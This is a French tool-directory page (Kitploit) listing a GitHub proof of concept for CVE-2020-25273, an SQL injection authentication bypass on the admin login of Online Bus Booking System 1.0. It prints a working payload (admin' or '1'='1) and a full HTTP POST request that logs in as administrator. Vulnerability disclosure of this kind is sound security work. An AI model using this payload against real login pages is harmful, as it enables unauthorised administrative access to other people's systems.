Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-25273 — Online Bus Booking System 1.0, il existe un contournement de l'authentification sur l'écran de connexion Admin dans admin.php via une injection SQL sur le nom d'utilisateur ou le mot de passe. | Kitploit
Outils/GitHubGitHub/jonathanrey87/cve-2020-25273
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubjonathanrey87/cve-2020-25273

CVE-2020-25273

Online Bus Booking System 1.0, il existe un contournement de l'authentification sur l'écran de connexion Admin dans admin.php via une injection SQL sur le nom d'utilisateur ou le mot de passe.

Voir le dépôt
il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-25273

Online Bus Booking System 1.0, il y a un contournement d'authentification sur l'écran de connexion administrateur dans admin.php via une injection SQL dans le nom d'utilisateur ou le mot de passe.

#Fournisseur - SourceCodester

#Produit -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0

#Type de vulnérabilité - Contournement d'authentification

#Composant affecté - bus_booking/admin.php

#Type d'attaque- Locale

#Élévation de privilèges - true

#Impact Exécution de code - true

Vecteur d'attaque

  1. Accédez au panneau de connexion administrateur et essayez de le contourner

  2. Dans la charge utile de la requête, définissez

    username : admin' or '1'='1

    password : admin' or '1'='1


POST /bus_booking/login_auth.php HTTP/1.1

Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0

username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1


Connexion réussie au tableau de bord administrateur

Télécharger l’outil